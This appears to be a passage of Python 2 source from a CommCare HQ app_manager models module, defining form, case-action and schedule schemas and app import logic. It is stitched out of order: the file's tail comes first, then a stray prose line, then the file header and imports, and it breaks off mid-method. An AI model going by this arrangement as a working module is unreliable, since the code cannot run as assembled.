xform = XForm(data)
except XFormException as e:
raise XFormException('In file %s: %s' % (location, e))
xform.exclude_languages(whitelist=langs_for_build)
data = xform.render()
files.update({location: data})
return files
def make_questions_map(self):
langs_for_build = self.get_build_langs()
if self.copy_of:
xmlns_map = {}
def fetch(location):
filepath = self.strip_location(location)
return self.fetch_attachment('files/%s' % filepath)
profile_xml = _parse_xml(fetch('profile.xml'))
suite_location = profile_xml.find(self.SUITE_XPATH).text
suite_xml = _parse_xml(fetch(suite_location))
for tag, location in self.get_locations(suite_xml):
if tag == 'xform':
xform = XForm(fetch(location))
xmlns = xform.data_node.tag_xmlns
questions = xform.get_questions(langs_for_build)
xmlns_map[xmlns] = questions
return xmlns_map
else:
return None
def get_questions(self, xmlns):
if not self.questions_map:
self.questions_map = self.make_questions_map()
if not self.questions_map:
return []
self.save()
questions = self.questions_map.get(xmlns, [])
return questions
str_to_cls = {
"Application": Application,
"Application-Deleted": Application,
"RemoteApp": RemoteApp,
"RemoteApp-Deleted": RemoteApp,
}
def import_app(app_id_or_source, domain, source_properties=None, validate_source_domain=None):
if isinstance(app_id_or_source, basestring):
app_id = app_id_or_source
source = get_app(None, app_id)
src_dom = source['domain']
if validate_source_domain:
validate_source_domain(src_dom)
source = source.export_json()
source = json.loads(source)
else:
cls = str_to_cls[app_id_or_source['doc_type']]
# Don't modify original app source
app = cls.wrap(deepcopy(app_id_or_source))
source = app.export_json(dump_json=False)
try:
attachments = source['_attachments']
except KeyError:
attachments = {}
finally:
source['_attachments'] = {}
if source_properties is not None:
for key, value in source_properties.iteritems():
source[key] = value
cls = str_to_cls[source['doc_type']]
# Allow the wrapper to update to the current default build_spec
if 'build_spec' in source:
del source['build_spec']
app = cls.from_source(source, domain)
app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
with app.atomic_blobs():
for name, attachment in attachments.items():
if re.match(ATTACHMENT_REGEX, name):
app.put_attachment(attachment, name)
if not app.is_remote_app():
for _, m in app.get_media_objects():
if domain not in m.valid_domains:
m.valid_domains.append(domain)
m.save()
if not app.is_remote_app() and any(module.uses_usercase() for module in app.get_modules()):
from corehq.apps.app_manager.util import enable_usercase
enable_usercase(domain)
return app
class DeleteApplicationRecord(DeleteRecord):
app_id = StringProperty()
def undo(self):
app = ApplicationBase.get(self.app_id)
app.doc_type = app.get_doc_type()
app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module = SchemaProperty(ModuleBase)
def undo(self):
app = Application.get(self.app_id)
modules = app.modules
modules.insert(self.module_id, self.module)
app.modules = modules
app.save()
class DeleteFormRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module_unique_id = StringProperty()
form_id = IntegerProperty()
form = SchemaProperty(FormBase)
def undo(self):
app = Application.get(self.app_id)
if self.module_unique_id is not None:
module = app.get_module_by_unique_id(self.module_unique_id)
else:
module = app.modules[self.module_id]
forms = module.forms
forms.insert(self.form_id, self.form)
module.forms = forms
app.save()
class CareplanAppProperties(DocumentSchema):
name = StringProperty()
latest_release = StringProperty()
case_type = StringProperty()
goal_conf = DictProperty()
task_conf = DictProperty()
class CareplanConfig(Document):
domain = StringProperty()
app_configs = SchemaDictProperty(CareplanAppProperties)
@classmethod
def for_domain(cls, domain):
res = cache_core.cached_view(
cls.get_db(),
"by_domain_doc_type_date/view",
key=[domain, 'CareplanConfig', None],
reduce=False,
include_docs=True,
wrapper=cls.wrap)
if len(res) > 0:
result = res[0]
else:
result = None
return result
# backwards compatibility with suite-1.0.xml
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)
ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)
ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)
Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
A module has one search config with many properties
# coding=utf-8
"""
Application terminology
For any given application, there are a number of different documents.
The primary application document is an instance of Application. This
document id is what you'll see in the URL on most app manager pages. Primary
application documents should have `copy_of == None` and `is_released ==
False`. When an application is saved, the field `version` is incremented.
When a user makes a build of an application, a copy of the primary
application document is made. These documents are the "versions" you see on
the deploy page. Each build document will have a different id, and the
`copy_of` field will be set to the ID of the primary application document.
Additionally, some attachments such as `profile.xml` and `suite.xml` will be
created and saved to the build doc (see `create_all_files`).
When a build is starred, this is called "releasing" the build. The parameter
`is_released` will be set to True on the build document.
You might also run in to remote applications and applications copied to be
published on the exchange, but those are quite infrequent.
"""
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from urllib2 import urlopen
from urlparse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from dimagi.ext.couchdbkit import *
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.core.urlresolvers import reverse
from django.template.loader import render_to_string
from restkit.errors import ResourceError
from couchdbkit.resource import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
LocationXpath,
)
from corehq.apps.builds import get_default_build_spec
from dimagi.utils.couch.cache import cache_core
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.make_uuid import random_hex
from dimagi.utils.web import get_url_base, parse_int
import commcare_translations
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import HQMediaMixin
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.models import CouchUser
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
split_path,
save_xform,
ParentCasePropertyBuilder,
is_usercase_in_use,
actions_use_usercase,
update_unique_ids,
app_callout_templates,
xpath_references_case,
xpath_references_user_case,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from .exceptions import (
AppEditingError,
BlankXFormError,
ConflictingCaseTypeError,
FormNotFoundException,
IncompatibleFormTypeException,
LocationXpathValidationError,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
CaseXPathValidationError,
UserCaseXPathValidationError,
)
from corehq.apps.reports.daterange import get_daterange_start_end_dates
from jsonpath_rw import jsonpath, parse
WORKFLOW_DEFAULT = 'default' # go to the app main screen
WORKFLOW_ROOT = 'root' # go to the module select screen
WORKFLOW_PARENT_MODULE = 'parent_module' # go to the parent module's screen
WORKFLOW_MODULE = 'module' # go to the current module's screen
WORKFLOW_PREVIOUS = 'previous_screen' # go to the previous screen (prior to entering the form)
WORKFLOW_FORM = 'form' # go straight to another form
ALL_WORKFLOWS = [
WORKFLOW_DEFAULT,
WORKFLOW_ROOT,
WORKFLOW_PARENT_MODULE,
WORKFLOW_MODULE,
WORKFLOW_PREVIOUS,
WORKFLOW_FORM,
]
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
FIELD_SEPARATOR = ':'
ATTACHMENT_REGEX = r'[^/]*\.xml'
ANDROID_LOGO_PROPERTY_MAPPING = {
'hq_logo_android_home': 'brand-banner-home',
'hq_logo_android_login': 'brand-banner-login',
}
def jsonpath_update(datum_context, value):
field = datum_context.path.fields[0]
parent = jsonpath.Parent().find(datum_context)[0]
parent.value[field] = value
# store a list of references to form ID's so that
# when an app is copied we can update the references
# with the new values
form_id_references = []
def FormIdProperty(expression, **kwargs):
"""
Create a StringProperty that references a form ID. This is necessary because
form IDs change when apps are copied so we need to make sure we update
any references to the them.
:param expression: jsonpath expression that can be used to find the field
:param kwargs: arguments to be passed to the underlying StringProperty
"""
path_expression = parse(expression)
assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
field = path_expression.right
assert len(field.fields) == 1, 'path expression can only reference a single field'
form_id_references.append(path_expression)
return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
@memoized
def load_app_template(slug):
path = os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'template_apps')
with open(os.path.join(path, slug + '.json')) as f:
return json.load(f)
@memoized
def load_case_reserved_words():
with open(os.path.join(os.path.dirname(__file__), 'static', 'app_manager', 'json', 'case-reserved-words.json')) as f:
return json.load(f)
@memoized
def load_form_template(filename):
with open(os.path.join(os.path.dirname(__file__), 'data', filename)) as f:
return f.read()
class IndexedSchema(DocumentSchema):
"""
Abstract class.
Meant for documents that appear in a list within another document
and need to know their own position within that list.
"""
def with_id(self, i, parent):
self._i = i
self._parent = parent
return self
@property
def id(self):
return self._i
def __eq__(self, other):
return other and (self.id == other.id) and (self._parent == other._parent)
class Getter(object):
def __init__(self, attr):
self.attr = attr
def __call__(self, instance):
items = getattr(instance, self.attr)
l = len(items)
for i, item in enumerate(items):
yield item.with_id(i % l, instance)
def __get__(self, instance, owner):
# thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
# this makes Getter('foo') act like a bound method
return types.MethodType(self, instance, owner)
class FormActionCondition(DocumentSchema):
"""
The condition under which to open/update/close a case/referral
Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
in which case the action takes place if question has answer answer,
or {'type': 'always'} in which case the action always takes place.
"""
type = StringProperty(choices=["if", "always", "never"], default="never")
question = StringProperty()
answer = StringProperty()
operator = StringProperty(choices=['=', 'selected'], default='=')
def is_active(self):
return self.type in ('if', 'always')
class FormAction(DocumentSchema):
"""
Corresponds to Case XML
"""
condition = SchemaProperty(FormActionCondition)
def is_active(self):
return self.condition.is_active()
@classmethod
def get_action_paths(cls, action):
if action.condition.type == 'if':
yield action.condition.question
for __, path in cls.get_action_properties(action):
yield path
@classmethod
def get_action_properties(self, action):
action_properties = action.properties()
if 'name_path' in action_properties and action.name_path:
yield 'name', action.name_path
if 'case_name' in action_properties:
yield 'name', action.case_name
if 'external_id' in action_properties and action.external_id:
yield 'external_id', action.external_id
if 'update' in action_properties:
for name, path in action.update.items():
yield name, path
if 'case_properties' in action_properties:
for name, path in action.case_properties.items():
yield name, path
if 'preload' in action_properties:
for path, name in action.preload.items():
yield name, path
class UpdateCaseAction(FormAction):
update = DictProperty()
class PreloadAction(FormAction):
preload = DictProperty()
def is_active(self):
return bool(self.preload)
class UpdateReferralAction(FormAction):
followup_date = StringProperty()
def get_followup_date(self):
if self.followup_date:
return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
followup_date=self.followup_date,
)
return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
name_path = StringProperty()
class OpenCaseAction(FormAction):
name_path = StringProperty()
external_id = StringProperty()
class OpenSubCaseAction(FormAction):
case_type = StringProperty()
case_name = StringProperty()
reference_id = StringProperty()
case_properties = DictProperty()
repeat_context = StringProperty()
# relationship = "child" for index to a parent case (default)
# relationship = "extension" for index to a host case
relationship = StringProperty(choices=['child', 'extension'], default='child')
close_condition = SchemaProperty(FormActionCondition)
class FormActions(DocumentSchema):
open_case = SchemaProperty(OpenCaseAction)
update_case = SchemaProperty(UpdateCaseAction)
close_case = SchemaProperty(FormAction)
open_referral = SchemaProperty(OpenReferralAction)
update_referral = SchemaProperty(UpdateReferralAction)
close_referral = SchemaProperty(FormAction)
case_preload = SchemaProperty(PreloadAction)
referral_preload = SchemaProperty(PreloadAction)
load_from_form = SchemaProperty(PreloadAction)
usercase_update = SchemaProperty(UpdateCaseAction)
usercase_preload = SchemaProperty(PreloadAction)
subcases = SchemaListProperty(OpenSubCaseAction)
def all_property_names(self):
names = set()
names.update(self.update_case.update.keys())
names.update(self.case_preload.preload.values())
for subcase in self.subcases:
names.update(subcase.case_properties.keys())
return names
class CaseIndex(DocumentSchema):
tag = StringProperty()
reference_id = StringProperty(default='parent')
relationship = StringProperty(choices=['child', 'extension'], default='child')
class AdvancedAction(IndexedSchema):
case_type = StringProperty()
case_tag = StringProperty()
case_properties = DictProperty()
# case_indices = NotImplemented
close_condition = SchemaProperty(FormActionCondition)
__eq__ = DocumentSchema.__eq__
def get_paths(self):
for path in self.case_properties.values():
yield path
if self.close_condition.type == 'if':
yield self.close_condition.question
def get_property_names(self):
return set(self.case_properties.keys())
@property
def is_subcase(self):
return bool(self.case_indices)
@property
def form_element_name(self):
return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
"""
Configuration for auto-selecting a case.
Attributes:
value_source Reference to the source of the value. For mode = fixture,
this represents the FixtureDataType ID. For mode = case
this represents the 'case_tag' for the case.
The modes 'user' and 'raw' don't require a value_source.
value_key The actual field that contains the case ID. Can be a case
index or a user data key or a fixture field name or the raw
xpath expression.
"""
mode = StringProperty(choices=[AUTO_SELECT_USER,
AUTO_SELECT_FIXTURE,
AUTO_SELECT_CASE,
AUTO_SELECT_USERCASE,
AUTO_SELECT_RAW])
value_source = StringProperty()
value_key = StringProperty(required=True)
class LoadUpdateAction(AdvancedAction):
"""
details_module: Use the case list configuration from this module to show the cases.
preload: Value from the case to load into the form. Keys are question paths, values are case properties.
auto_select: Configuration for auto-selecting the case
show_product_stock: If True list the product stock using the module's Product List configuration.
product_program: Only show products for this CommCare Supply program.
"""
details_module = StringProperty()
preload = DictProperty()
auto_select = SchemaProperty(AutoSelectCase, default=None)
show_product_stock = BooleanProperty(default=False)
product_program = StringProperty()
case_index = SchemaProperty(CaseIndex)
@property
def case_indices(self):
# Allows us to ducktype AdvancedOpenCaseAction
return [self.case_index] if self.case_index.tag else []
@case_indices.setter
def case_indices(self, value):
if len(value) > 1:
raise ValueError('A LoadUpdateAction cannot have more than one case index')
if value:
self.case_index = value[0]
else:
self.case_index = CaseIndex()
@case_indices.deleter
def case_indices(self):
self.case_index = CaseIndex()
def get_paths(self):
for path in super(LoadUpdateAction, self).get_paths():
yield path
for path in self.preload.keys():
yield path
def get_property_names(self):
names = super(LoadUpdateAction, self).get_property_names()
names.update(self.preload.values())
return names
@property
def case_session_var(self):
return 'case_id_{0}'.format(self.case_tag)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
data['case_index'] = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
name_path = StringProperty()
repeat_context = StringProperty()
case_indices = SchemaListProperty(CaseIndex)
open_condition = SchemaProperty(FormActionCondition)
def get_paths(self):
for path in super(AdvancedOpenCaseAction, self).get_paths():
yield path
yield self.name_path
if self.open_condition.type == 'if':
yield self.open_condition.question
@property
def case_session_var(self):
return 'case_id_new_{}_{}'.format(self.case_type, self.id)
@classmethod
def wrap(cls, data):
if 'parent_tag' in data:
if data['parent_tag']:
index = {
'tag': data['parent_tag'],
'reference_id': data.get('parent_reference_id', 'parent'),
'relationship': data.get('relationship', 'child')
}
if hasattr(data.get('case_indices'), 'append'):
data['case_indices'].append(index)
else:
data['case_indices'] = [index]
del data['parent_tag']
data.pop('parent_reference_id', None)
data.pop('relationship', None)
return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
load_update_cases = SchemaListProperty(LoadUpdateAction)
open_cases = SchemaListProperty(AdvancedOpenCaseAction)
get_load_update_actions = IndexedSchema.Getter('load_update_cases')
get_open_actions = IndexedSchema.Getter('open_cases')
def get_all_actions(self):
return itertools.chain(self.get_load_update_actions(), self.get_open_actions())
def get_subcase_actions(self):
return (a for a in self.get_all_actions() if a.case_indices)
def get_open_subcase_actions(self, parent_case_type=None):
for action in self.open_cases:
if action.case_indices:
if not parent_case_type:
yield action
else:
if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
for case_index in action.case_indices):
yield action
def get_case_tags(self):
for action in self.get_all_actions():
yield action.case_tag
def get_action_from_tag(self, tag):
return self.actions_meta_by_tag.get(tag, {}).get('action', None)
@property
def actions_meta_by_tag(self):
return self._action_meta()['by_tag']
@property
def actions_meta_by_parent_tag(self):
return self._action_meta()['by_parent_tag']
@property
def auto_select_actions(self):
return self._action_meta()['by_auto_select_mode']
@memoized
def _action_meta(self):
meta = {
'by_tag': {},
'by_parent_tag': {},
'by_auto_select_mode': {
AUTO_SELECT_USER: [],
AUTO_SELECT_CASE: [],
AUTO_SELECT_FIXTURE: [],
AUTO_SELECT_USERCASE: [],
AUTO_SELECT_RAW: [],
}
}
def add_actions(type, action_list):
for action in action_list:
meta['by_tag'][action.case_tag] = {
'type': type,
'action': action
}
for parent in action.case_indices:
meta['by_parent_tag'][parent.tag] = {
'type': type,
'action': action
}
if type == 'load' and action.auto_select and action.auto_select.mode:
meta['by_auto_select_mode'][action.auto_select.mode].append(action)
add_actions('load', self.get_load_update_actions())
add_actions('open', self.get_open_actions())
return meta
class FormSource(object):
def __get__(self, form, form_cls):
if not form:
return self
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
# for backwards compatibility of really old apps
try:
old_contents = form['contents']
except AttributeError:
pass
else:
app.lazy_put_attachment(old_contents, filename)
del form['contents']
try:
source = app.lazy_fetch_attachment(filename)
except ResourceNotFound:
source = ''
return source
def __set__(self, form, value):
unique_id = form.get_unique_id()
app = form.get_app()
filename = "%s.xml" % unique_id
app.lazy_put_attachment(value, filename)
form.validation_cache = None
try:
form.xmlns = form.wrapped_xform().data_node.tag_xmlns
except Exception:
form.xmlns = None
class CachedStringProperty(object):
def __init__(self, key):
self.get_key = key
def __get__(self, instance, owner):
return self.get(self.get_key(instance))
def __set__(self, instance, value):
self.set(self.get_key(instance), value)
@classmethod
def get(cls, key):
return cache.get(key)
@classmethod
def set(cls, key, value):
cache.set(key, value, 7*24*60*60) # cache for 7 days
class ScheduleVisit(IndexedSchema):
"""
due: Days after the anchor date that this visit is due
starts: Days before the due date that this visit is valid from
expires: Days after the due date that this visit is valid until (optional)
repeats: Whether this is a repeat visit (one per form allowed)
increment: Days after the last visit that the repeat visit occurs
"""
due = IntegerProperty()
starts = IntegerProperty()
expires = IntegerProperty()
repeats = BooleanProperty(default=False)
increment = IntegerProperty()
@property
def id(self):
"""Visits are 1-based indexed"""
_id = super(ScheduleVisit, self).id
return _id + 1
class FormDatum(DocumentSchema):
name = StringProperty()
xpath = StringProperty()
class FormLink(DocumentSchema):
"""
xpath: xpath condition that must be true in order to open next form
form_id: id of next form to open
"""
xpath = StringProperty()
form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
"""
starts: Days after the anchor date that this schedule starts
expires: Days after the anchor date that this schedule expires (optional)
visits: List of visits in this schedule
allow_unscheduled: Allow unscheduled visits in this schedule
transition_condition: Condition under which we transition to the next phase
termination_condition: Condition under which we terminate the whole schedule
"""
enabled = BooleanProperty(default=True)
starts = IntegerProperty()
expires = IntegerProperty()
allow_unscheduled = BooleanProperty(default=False)
visits = SchemaListProperty(ScheduleVisit)
get_visits = IndexedSchema.Getter('visits')
transition_condition = SchemaProperty(FormActionCondition)
termination_condition = SchemaProperty(FormActionCondition)
class CommentMixin(DocumentSchema):
"""
Documentation comment for app builders and maintainers
"""
comment = StringProperty(default='')
@property
def short_comment(self):
"""
Trim comment to 500 chars (about 100 words)
"""
return self.comment if len(self.comment) <= 500 else self.comment[:497] + '...'
class FormBase(DocumentSchema):
"""
Part of a Managed Application; configuration for a form.
Translates to a second-level menu on the phone
"""
form_type = None
name = DictProperty(unicode)
unique_id = StringProperty()
show_count = BooleanProperty(default=False)
xmlns = StringProperty()
version = IntegerProperty()
source = FormSource()
validation_cache = CachedStringProperty(
lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
)
post_form_workflow = StringProperty(
default=WORKFLOW_DEFAULT,
choices=ALL_WORKFLOWS
)
auto_gps_capture = BooleanProperty(default=False)
no_vellum = BooleanProperty(default=False)
form_links = SchemaListProperty(FormLink)
schedule_form_id = StringProperty()
@classmethod
def wrap(cls, data):
data.pop('validation_cache', '')
if cls is FormBase:
doc_type = data['doc_type']
if doc_type == 'Form':
return Form.wrap(data)
elif doc_type == 'AdvancedForm':
return AdvancedForm.wrap(data)
else:
try:
return CareplanForm.wrap(data)
except ValueError:
raise ValueError('Unexpected doc_type for Form', doc_type)
else:
return super(FormBase, cls).wrap(data)
@classmethod
def get_form(cls, form_unique_id, and_app=False):
try:
d = Application.get_db().view(
'app_manager/xforms_index',
key=form_unique_id
).one()
except MultipleResultsFound as e:
raise XFormIdNotUnique(
"xform id '%s' not unique: %s" % (form_unique_id, e)
)
if d:
d = d['value']
else:
raise ResourceNotFound()
# unpack the dict into variables app_id, module_id, form_id
app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
app = Application.get(app_id)
form = app.get_form(unique_id)
if and_app:
return form, app
else:
return form
def pre_delete_hook(self):
raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
""" Called before a form is moved between modules or to a different position """
raise NotImplementedError()
def wrapped_xform(self):
return XForm(self.source)
def validate_form(self):
vc = self.validation_cache
if vc is None:
# formtranslate requires all attributes to be valid xpaths, but
# vellum namespaced attributes aren't
form = self.wrapped_xform()
form.strip_vellum_ns_attributes()
try:
if form.xml is not None:
validate_xform(etree.tostring(form.xml),
version=self.get_app().application_version)
except XFormValidationError as e:
validation_dict = {
"fatal_error": e.fatal_error,
"validation_problems": e.validation_problems,
"version": e.version,
}
vc = self.validation_cache = json.dumps(validation_dict)
else:
vc = self.validation_cache = ""
if vc:
try:
raise XFormValidationError(**json.loads(vc))
except ValueError:
self.validation_cache = None
return self.validate_form()
return self
def validate_for_build(self, validate_module=True):
errors = []
try:
module = self.get_module()
except AttributeError:
module = None
meta = {
'form_type': self.form_type,
'module': module.get_module_info() if module else {},
'form': {"id": self.id if hasattr(self, 'id') else None, "name": self.name}
}
xml_valid = False
if self.source == '':
errors.append(dict(type="blank form", **meta))
else:
try:
_parse_xml(self.source)
xml_valid = True
except XFormException as e:
errors.append(dict(
type="invalid xml",
message=unicode(e) if self.source else '',
**meta
))
except ValueError:
logging.error("Failed: _parse_xml(string=%r)" % self.source)
raise
else:
try:
self.validate_form()
except XFormValidationError as e:
error = {'type': 'validation error', 'validation_message': unicode(e)}
error.update(meta)
errors.append(error)
if self.post_form_workflow == WORKFLOW_FORM:
if not self.form_links:
errors.append(dict(type="no form links", **meta))
for form_link in self.form_links:
try:
self.get_app().get_form(form_link.form_id)
except FormNotFoundException:
errors.append(dict(type='bad form link', **meta))
# this isn't great but two of FormBase's subclasses have form_filter
if hasattr(self, 'form_filter') and self.form_filter:
is_valid, message = validate_xpath(self.form_filter, allow_case_hashtags=True)
if not is_valid:
error = {
'type': 'form filter has xpath error',
'xpath_error': message,
}
error.update(meta)
errors.append(error)
errors.extend(self.extended_build_validation(meta, xml_valid, validate_module))
return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
"""
Override to perform additional validation during build process.
"""
return []
def get_unique_id(self):
"""
Return unique_id if it exists, otherwise initialize it
Does _not_ force a save, so it's the caller's responsibility to save the app
"""
if not self.unique_id:
self.unique_id = random_hex()
return self.unique_id
def get_app(self):
return self._app
def get_version(self):
return self.version if self.version else self.get_app().version
def add_stuff_to_xform(self, xform, build_profile_id=None):
app = self.get_app()
langs = app.get_build_langs(build_profile_id)
xform.exclude_languages(langs)
xform.set_default_language(langs[0])
xform.normalize_itext()
xform.strip_vellum_ns_attributes()
xform.set_version(self.get_version())
def render_xform(self, build_profile_id=None):
xform = XForm(self.source)
self.add_stuff_to_xform(xform, build_profile_id)
return xform.render()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'])
def get_questions(self, langs, include_triggers=False,
include_groups=False, include_translations=False):
return XForm(self.source).get_questions(
langs=langs,
include_triggers=include_triggers,
include_groups=include_groups,
include_translations=include_translations,
)
@memoized
def get_case_property_name_formatter(self):
"""Get a function that formats case property names
The returned function requires two arguments
`(case_property_name, data_path)` and returns a string.
"""
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[])}
except XFormException as e:
# punt on invalid xml (sorry, no rich attachments)
valid_paths = {}
def format_key(key, path):
if valid_paths.get(path) == "upload":
return u"{}{}".format(ATTACHMENT_PREFIX, key)
return key
return format_key
def export_json(self, dump_json=True):
source = self.to_json()
del source['unique_id']
return json.dumps(source) if dump_json else source
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
try:
self.rename_xform_language(old_lang, new_lang)
except XFormException:
pass
def rename_xform_language(self, old_code, new_code):
source = XForm(self.source)
if source.exists():
source.rename_language(old_code, new_code)
source = source.render()
self.source = source
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
@property
def full_path_name(self):
return "%(app_name)s > %(module_name)s > %(form_name)s" % {
'app_name': self.get_app().name,
'module_name': self.get_module().default_name(),
'form_name': self.default_name()
}
@property
def has_fixtures(self):
return 'src="jr://fixture/item-list:' in self.source
def get_auto_gps_capture(self):
app = self.get_app()
if app.build_version and app.enable_auto_gps:
return self.auto_gps_capture or app.auto_gps_capture
else:
return False
def is_registration_form(self, case_type=None):
"""
Should return True if this form passes the following tests:
* does not require a case
* registers a case of type 'case_type' if supplied
"""
raise NotImplementedError()
def uses_usercase(self):
raise NotImplementedError()
def update_app_case_meta(self, app_case_meta):
pass
@property
@memoized
def case_list_modules(self):
case_list_modules = [
mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
]
return case_list_modules
@property
def is_case_list_form(self):
return bool(self.case_list_modules)
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
def get_app(self):
return self._parent._parent
def get_module(self):
return self._parent
def get_case_type(self):
return self._parent.case_type
def check_case_properties(self, all_names=None, subcase_names=None, case_tag=None):
all_names = all_names or []
subcase_names = subcase_names or []
errors = []
# reserved_words are hard-coded in three different places!
# Here, case-config-ui-*.js, and module_view.html
reserved_words = load_case_reserved_words()
for key in all_names:
try:
validate_property(key)
except ValueError:
errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
_, key = split_path(key)
if key in reserved_words:
errors.append({'type': 'update_case uses reserved word', 'word': key, 'case_tag': case_tag})
# no parent properties for subcase
for key in subcase_names:
if not re.match(r'^[a-zA-Z][\w_-]*$', key):
errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
return errors
def check_paths(self, paths):
errors = []
try:
valid_paths = {question['value']: question['tag']
for question in self.get_questions(langs=[], include_triggers=True)}
except XFormException as e:
errors.append({'type': 'invalid xml', 'message': unicode(e)})
else:
no_multimedia = not self.get_app().enable_multimedia_case_property
for path in set(paths):
if path not in valid_paths:
errors.append({'type': 'path error', 'path': path})
elif no_multimedia and valid_paths[path] == "upload":
errors.append({'type': 'multimedia case property not supported', 'path': path})
return errors
def add_property_save(self, app_case_meta, case_type, name,
questions, question_path, condition=None):
if question_path in questions:
app_case_meta.add_property_save(
case_type,
name,
self.unique_id,
questions[question_path],
condition
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
def add_property_load(self, app_case_meta, case_type, name,
questions, question_path):
if question_path in questions:
app_case_meta.add_property_load(
case_type,
name,
self.unique_id,
questions[question_path]
)
else:
app_case_meta.add_property_error(
case_type,
name,
self.unique_id,
"%s is not a valid question" % question_path
)
class JRResourceProperty(StringProperty):
def validate(self, value, required=True):
super(JRResourceProperty, self).validate(value, required)
if value is not None and not value.startswith('jr://'):
raise BadValueError("JR Resources must start with 'jr://")
return value
class NavMenuItemMediaMixin(DocumentSchema):
"""
Language-specific icon and audio.
Properties are map of lang-code to filepath
"""
media_image = SchemaDictProperty(JRResourceProperty)
media_audio = SchemaDictProperty(JRResourceProperty)
@classmethod
def wrap(cls, data):
# ToDo - Remove after migration
for media_attr in ('media_image', 'media_audio'):
old_media = data.get(media_attr, None)
if old_media and isinstance(old_media, basestring):
new_media = {'default': old_media}
